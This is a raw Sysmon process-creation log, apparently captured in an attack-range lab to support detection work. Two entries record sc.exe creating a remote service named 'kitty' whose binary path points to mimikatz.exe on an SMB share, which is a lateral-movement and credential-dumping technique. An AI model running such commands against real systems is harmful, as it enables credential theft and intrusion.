154100x800000000000000028592515Microsoft-Windows-Sysmon/Operationalmswin-server.attackrange.local-2023-03-20 20:06:48.877{EF490992-BCD8-6418-EF9A-00000000C702}6928C:\Windows\System32\sc.exe10.0.14393.0 (rs1_release.160715-1616)Service Control Manager Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsc.exe"C:\Windows\system32\sc.exe" \\localhost create kitty binPath= \\10.0.1.17\c$\temp\mimikatz.exeC:\Users\Administrator\MSWIN-SERVER\Administrator{EF490992-EEBB-6411-9D9F-620000000000}0x629f9d2HighMD5=BD31EB150F6547D18329E5F00801D1CD,SHA256=8A775B86CE1A057E290CCD26C59C96070684468A3119790743A346CD54F4DFDF{EF490992-344F-6413-951D-00000000C702}3168C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe" MSWIN-SERVER\Administrator 154100x800000000000000028326881Microsoft-Windows-Sysmon/Operationalmswin-server.attackrange.local-2023-03-20 17:12:28.939{EF490992-93FC-6418-1C97-00000000C702}1816C:\Windows\System32\sc.exe10.0.14393.0 (rs1_release.160715-1616)Service Control Manager Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsc.exe"C:\Windows\system32\sc.exe" \\10.0.1.14 create kitty binPath= \\10.0.1.17\c$\temp\mimikatz.exeC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{EF490992-7AA9-6418-EFD7-011200000000}0x1201d7ef2HighMD5=BD31EB150F6547D18329E5F00801D1CD,SHA256=8A775B86CE1A057E290CCD26C59C96070684468A3119790743A346CD54F4DFDF{EF490992-7AAE-6418-C694-00000000C702}4852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator